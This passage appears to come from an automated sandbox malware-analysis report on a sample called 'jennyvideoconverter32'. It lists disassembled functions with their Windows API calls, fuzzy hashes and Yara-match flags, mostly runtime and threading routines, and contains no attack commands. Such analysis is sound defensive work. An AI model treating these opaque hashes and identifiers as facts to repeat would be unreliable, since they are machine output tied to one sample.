                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual$FreeHeap
                                                                            • String ID: r@$r@
                                                                            • API String ID: 714016831-1712950306
                                                                            • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                            • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                                            • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                            • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 02E35CD4
                                                                              • Part of subcall function 02E38442: RtlEncodePointer.NTDLL(00000000), ref: 02E38445
                                                                              • Part of subcall function 02E38442: __initp_misc_winsig.LIBCMT ref: 02E38460
                                                                              • Part of subcall function 02E38442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02E51578,00000008,00000003,02E50F5C,?,00000001), ref: 02E391C1
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02E391D5
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02E391E8
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02E391FB
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02E3920E
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02E39221
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02E39234
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02E39247
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02E3925A
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02E3926D
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02E39280
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02E39293
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02E392A6
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02E392B9
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02E392CC
                                                                              • Part of subcall function 02E38442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02E392DF
                                                                            • __mtinitlocks.LIBCMT ref: 02E35CD9
                                                                            • __mtterm.LIBCMT ref: 02E35CE2
                                                                              • Part of subcall function 02E35D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02E38878
                                                                              • Part of subcall function 02E35D4A: _free.LIBCMT ref: 02E3887F
                                                                              • Part of subcall function 02E35D4A: RtlDeleteCriticalSection.NTDLL(02E53978), ref: 02E388A1
                                                                            • __calloc_crt.LIBCMT ref: 02E35D07
                                                                            • __initptd.LIBCMT ref: 02E35D29
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02E35D30
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            • Opcode ID: 5d6dec31beba135531782c5bfbad3c3291e9a609e5e1c0808ce5e311e3ccdff0
                                                                            • Instruction ID: 6b2d4b81099fdd73c5c69ce89fedb8f354c6f68317aaf6260aa39750246bce9e
                                                                            • Opcode Fuzzy Hash: 5d6dec31beba135531782c5bfbad3c3291e9a609e5e1c0808ce5e311e3ccdff0
                                                                            • Instruction Fuzzy Hash: F3F0F6325D83211EE62A76B57C0E25B2782DB0673BBA0FA19F454C92C0FF118841C952
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02E333B6,00000000), ref: 02E3341E
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E33425
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02E33431
                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02E3344E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            • Opcode ID: ae5d1bfbaae50e274a005a1e64298561d45c94c1896ccde0a3ed5fe52f781e6f
                                                                            • Instruction ID: 7bfffe296c89d3020446978c9067ba2e9c3fd20a850a3851963bf25affe1dc36
                                                                            • Opcode Fuzzy Hash: ae5d1bfbaae50e274a005a1e64298561d45c94c1896ccde0a3ed5fe52f781e6f
                                                                            • Instruction Fuzzy Hash: EEE01274EE0310ABEB255F72EC4DF0576AAAB40757FD09860B006D1290CBB950E59FA0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02E333F3), ref: 02E334F3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E334FA
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02E33505
                                                                            • RtlDecodePointer.NTDLL(02E333F3), ref: 02E33520
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: bd9baae4df8bd3c68ac8ab04a93e40c70dc2a7178ac89e21ac5e49c0aa1ad23c
                                                                            • Instruction ID: 370663eab57d5c72c4541551e88cb0e06982174659dfaabccaf562e517acfa6e
                                                                            • Opcode Fuzzy Hash: bd9baae4df8bd3c68ac8ab04a93e40c70dc2a7178ac89e21ac5e49c0aa1ad23c
                                                                            • Instruction Fuzzy Hash: 54E04FB4DE0310ABEB345F72AC0CB0237A9BB40707FC05C50F102E1241DB7855A4CAA0
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(0000002A,83812041,?,?,?,?,00000000,02E469F8,000000FF,02E3210A), ref: 02E31EAA
                                                                            • TlsSetValue.KERNEL32(0000002A,02E3210A,?,?,00000000), ref: 02E31F17
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E31F41
                                                                            • HeapFree.KERNEL32(00000000), ref: 02E31F44
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapValue$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 1812714009-0
                                                                            • Opcode ID: fff139402bb701d7b7132432325214d92f886d3d1877846d5256e34e685b267a
                                                                            • Instruction ID: 98ff6b9f45c44eefa14a4b43e7b5b3a638f77d155077793cb58606b3cc0d0284
                                                                            • Opcode Fuzzy Hash: fff139402bb701d7b7132432325214d92f886d3d1877846d5256e34e685b267a
                                                                            • Instruction Fuzzy Hash: E8519D35A843449FD721CF2AC848B26BBE5AF85669F45D65CF85DDB280D770EC00CB90
                                                                            APIs
                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02E456D0
                                                                            • __FindPESection.LIBCMT ref: 02E456EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                            • String ID:
                                                                            • API String ID: 876702719-0
                                                                            • Opcode ID: 64c0a9460a00b57a28a9cf4a10b8df149b4b2553ec91131245bfcb29147ad114
                                                                            • Instruction ID: 7a129e33ec1d591b654ba939c350cf5b495e28a7dbe390cf149f9fe630b299db
                                                                            • Opcode Fuzzy Hash: 64c0a9460a00b57a28a9cf4a10b8df149b4b2553ec91131245bfcb29147ad114
                                                                            • Instruction Fuzzy Hash: 3BA1D475E80715CFCB24CF19E884BADB7A5FB64728F94A5A9EC0597241EB30EC50CB90
                                                                            APIs
                                                                            • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                                            • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: StringType$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3852931651-0
                                                                            • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                            • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                                            • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                            • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                                            APIs
                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02E21CB1
                                                                            • CloseHandle.KERNEL32(?), ref: 02E21CBA
                                                                            • InterlockedExchangeAdd.KERNEL32(02E57244,00000000), ref: 02E21CC6
                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02E21CD4
                                                                            • QueueUserAPC.KERNEL32(02E21E7C,?,00000000), ref: 02E21CE1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02E21CEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                            • String ID:
                                                                            • API String ID: 1946104331-0
                                                                            • Opcode ID: c7af615978279afff365a01500aa3eaaa359167e8a6468f20aef1358d988f8f5
                                                                            • Instruction ID: ec861d329e070bd6a5cdfe112e22a8cf8bb50de937e76b28c0851e897bb92d8f
                                                                            • Opcode Fuzzy Hash: c7af615978279afff365a01500aa3eaaa359167e8a6468f20aef1358d988f8f5
                                                                            • Instruction Fuzzy Hash: 15F0A4395C1214BFD7204B96DC0DD97FFFCEB45720B40865DF56A82190DB706951CBA0
                                                                            APIs
                                                                              • Part of subcall function 02E29A0C: __EH_prolog.LIBCMT ref: 02E29A11
                                                                              • Part of subcall function 02E29A0C: _Allocate.LIBCPMT ref: 02E29A68
                                                                              • Part of subcall function 02E29A0C: _memmove.LIBCMT ref: 02E29ABF
                                                                            • _memset.LIBCMT ref: 02E30879
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02E308E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02E308EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                            • String ID: Unknown error$invalid string position
                                                                            • API String ID: 1854462395-1837348584
                                                                            • Opcode ID: bfddfc757b230213849ec6fc4fdf311648fe970580a65976042c4e7356299056
                                                                            • Instruction ID: 21aec93419601254f28192ccfd0024ad0931e373cab8ac8d023f1dbacc782d71
                                                                            • Opcode Fuzzy Hash: bfddfc757b230213849ec6fc4fdf311648fe970580a65976042c4e7356299056
                                                                            • Instruction Fuzzy Hash: 9B51DD702883418FEB15CF25C884B2FBBE4ABD8749F50992DF48297291D771E588CF92
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32 ref: 004038C7
                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                            • API String ID: 1385375860-4131005785
                                                                            • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                            • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                                            • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                            • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02E318BF
                                                                              • Part of subcall function 02E32413: std::exception::_Copy_str.LIBCMT ref: 02E3242C
                                                                              • Part of subcall function 02E30C90: __CxxThrowException@8.LIBCMT ref: 02E30CEE
                                                                            • std::exception::exception.LIBCMT ref: 02E3191E
                                                                            Strings
                                                                            • $, xrefs: 02E31923
                                                                            • boost unique_lock has no mutex, xrefs: 02E318AE
                                                                            • boost unique_lock owns already the mutex, xrefs: 02E3190D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                            • API String ID: 2140441600-46888669
                                                                            • Opcode ID: 34a2176a2599f5d8ed2b44a7879a4e1fb65811b6f5d59211e91eeebfa86f4783
                                                                            • Instruction ID: c22de73fe915d14a8ac17ddb399f1db8f72fb8d5316d3514c7d40640e4b56eff
                                                                            • Opcode Fuzzy Hash: 34a2176a2599f5d8ed2b44a7879a4e1fb65811b6f5d59211e91eeebfa86f4783
                                                                            • Instruction Fuzzy Hash: A42106B15483809FD721DF24D54875BBBE9BF88718F40AD5EF4A587280DBB59808CF92
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 02E349C0
                                                                              • Part of subcall function 02E35BB2: GetLastError.KERNEL32(771B0A60,771AF550,02E35DA0,02E32F73,771AF550,?,02E2606D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02E26508), ref: 02E35BB4
                                                                              • Part of subcall function 02E35BB2: __calloc_crt.LIBCMT ref: 02E35BD5
                                                                              • Part of subcall function 02E35BB2: __initptd.LIBCMT ref: 02E35BF7
                                                                              • Part of subcall function 02E35BB2: GetCurrentThreadId.KERNEL32 ref: 02E35BFE
                                                                              • Part of subcall function 02E35BB2: SetLastError.KERNEL32(00000000,02E2606D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02E26508), ref: 02E35C16
                                                                            • __calloc_crt.LIBCMT ref: 02E349E3
                                                                            • __get_sys_err_msg.LIBCMT ref: 02E34A01
                                                                            • __invoke_watson.LIBCMT ref: 02E34A1E
                                                                            Strings
                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02E349CB, 02E349F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                            • API String ID: 109275364-798102604
                                                                            • Opcode ID: 494d1f8050e6ec50d383feec94f478f71973b06304f7229a2415360fa2aecbd0
                                                                            • Instruction ID: 8facb2dfafa0e314fcae1feab1e9dfea15619324b72f8f928072e21bef843824
                                                                            • Opcode Fuzzy Hash: 494d1f8050e6ec50d383feec94f478f71973b06304f7229a2415360fa2aecbd0
                                                                            • Instruction Fuzzy Hash: 51F050335C47062BD723A51A5C4866B72CDEF417A7B00E526F9C8DB280EF21CC00C695
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E22350
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E22360
                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02E22370
                                                                            • GetLastError.KERNEL32 ref: 02E2237A
                                                                              • Part of subcall function 02E21712: __EH_prolog.LIBCMT ref: 02E21717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID: pqcs
                                                                            • API String ID: 1619523792-2559862021
                                                                            • Opcode ID: 7ab039e022070f5f0f74f24696f4ff16033a02295edf03b6bae34e076c6d50b6
                                                                            • Instruction ID: 575a7ba366bd32dba4c8a608204c1b4cf2ca6bc46f8d48e6f89fbf24cfabeb43
                                                                            • Opcode Fuzzy Hash: 7ab039e022070f5f0f74f24696f4ff16033a02295edf03b6bae34e076c6d50b6
                                                                            • Instruction Fuzzy Hash: B0F090709C1305ABDB10AFB59909BABBBECFB00205B809969F906D3140EB70A9558B91
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E24035
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02E24042
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02E24049
                                                                            • std::exception::exception.LIBCMT ref: 02E24063
                                                                              • Part of subcall function 02E2A5FD: __EH_prolog.LIBCMT ref: 02E2A602
                                                                              • Part of subcall function 02E2A5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02E2A611
                                                                              • Part of subcall function 02E2A5FD: __CxxThrowException@8.LIBCMT ref: 02E2A630
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3112922283-2104205924
                                                                            • Opcode ID: d2940b5d0412c5b1636f701746496a78fbded0328c8fbf6eb236c81ad0dea640
                                                                            • Instruction ID: e26b41484d523df26ba6c64fec15c27f162dbdbabfd9fab27a0379515615f2ba
                                                                            • Opcode Fuzzy Hash: d2940b5d0412c5b1636f701746496a78fbded0328c8fbf6eb236c81ad0dea640
                                                                            • Instruction Fuzzy Hash: 44F08271DC42099BDB00EFE0E919BEFB778EB04305F809555F915A2240DB345219CF91
                                                                            APIs
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                                            • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                                            • GetFileType.KERNEL32(00000000), ref: 00403836
                                                                            • SetHandleCount.KERNEL32 ref: 0040386D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                            • String ID:
                                                                            • API String ID: 1710529072-0
                                                                            • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                            • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                                            • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                            • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                                            APIs
                                                                              • Part of subcall function 02E31990: CloseHandle.KERNEL32(00000000,83812041), ref: 02E319E1
                                                                              • Part of subcall function 02E31990: WaitForSingleObject.KERNEL32(?,000000FF,83812041,?,?,?,?,83812041,02E31963,83812041), ref: 02E319F8
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02E31C5E
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02E31C7E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02E31CB7
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02E31D0B
                                                                            • SetEvent.KERNEL32(?), ref: 02E31D12
                                                                              • Part of subcall function 02E2418C: CloseHandle.KERNEL32(00000000,?,02E31C45), ref: 02E241B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 4166353394-0
                                                                            • Opcode ID: 9436fb0fe0b6ab4a8c27847b1cd3905e2df358478be9ad04ea316ebb4eea9017
                                                                            • Instruction ID: acd7132423f0887c4f6085a7de2b958273f50862cdfec28448ee672cf5886cde
                                                                            • Opcode Fuzzy Hash: 9436fb0fe0b6ab4a8c27847b1cd3905e2df358478be9ad04ea316ebb4eea9017
                                                                            • Instruction Fuzzy Hash: C541D1305803118BDB26CF28CC84756B7A4EF4632AF64966CEC19DF291D735D801CBA1
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2E030
                                                                              • Part of subcall function 02E21A01: TlsGetValue.KERNEL32 ref: 02E21A0A
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E2E0AF
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E2E0CB
                                                                            • InterlockedIncrement.KERNEL32(02E55180), ref: 02E2E0F0
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E2E105
                                                                              • Part of subcall function 02E227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02E2284E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                            • String ID:
                                                                            • API String ID: 1578506061-0
                                                                            • Opcode ID: ba59aaa5377a2b111a6e52e1110d418b2a709a63c181306f84805e81e332ac96
                                                                            • Instruction ID: f526fa0a8f5282b03754aeaef81fc8bcfc0fd0861b8a280ca1e7f778b0a54057
                                                                            • Opcode Fuzzy Hash: ba59aaa5377a2b111a6e52e1110d418b2a709a63c181306f84805e81e332ac96
                                                                            • Instruction Fuzzy Hash: 553169B1D412249FCB10DFA9C444AAEBBF9BF08314F04895EE84AD7640E774A609CFA0
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02E402F0
                                                                              • Part of subcall function 02E32EEC: __FF_MSGBANNER.LIBCMT ref: 02E32F03
                                                                              • Part of subcall function 02E32EEC: __NMSG_WRITE.LIBCMT ref: 02E32F0A
                                                                              • Part of subcall function 02E32EEC: RtlAllocateHeap.NTDLL(00AD0000,00000000,00000001), ref: 02E32F2F
                                                                            • _free.LIBCMT ref: 02E40303
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: b483fc248847d0139aee9b4cdf2c6de378c43ba399cccfe8fed5f7a1b24b35e6
                                                                            • Instruction ID: a3ec31720a7e9e9d26afae3807906cfd21ce35eaa6c1db32ced823b73023571b
                                                                            • Opcode Fuzzy Hash: b483fc248847d0139aee9b4cdf2c6de378c43ba399cccfe8fed5f7a1b24b35e6
                                                                            • Instruction Fuzzy Hash: 6F11C8329C8211EBDB2A2F71F80C75A3B999B05369B40E935FB098A250DF309850CA90
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E221DA
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E221ED
                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02E22224
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02E22237
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02E22261
                                                                              • Part of subcall function 02E22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02E22350
                                                                              • Part of subcall function 02E22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02E22360
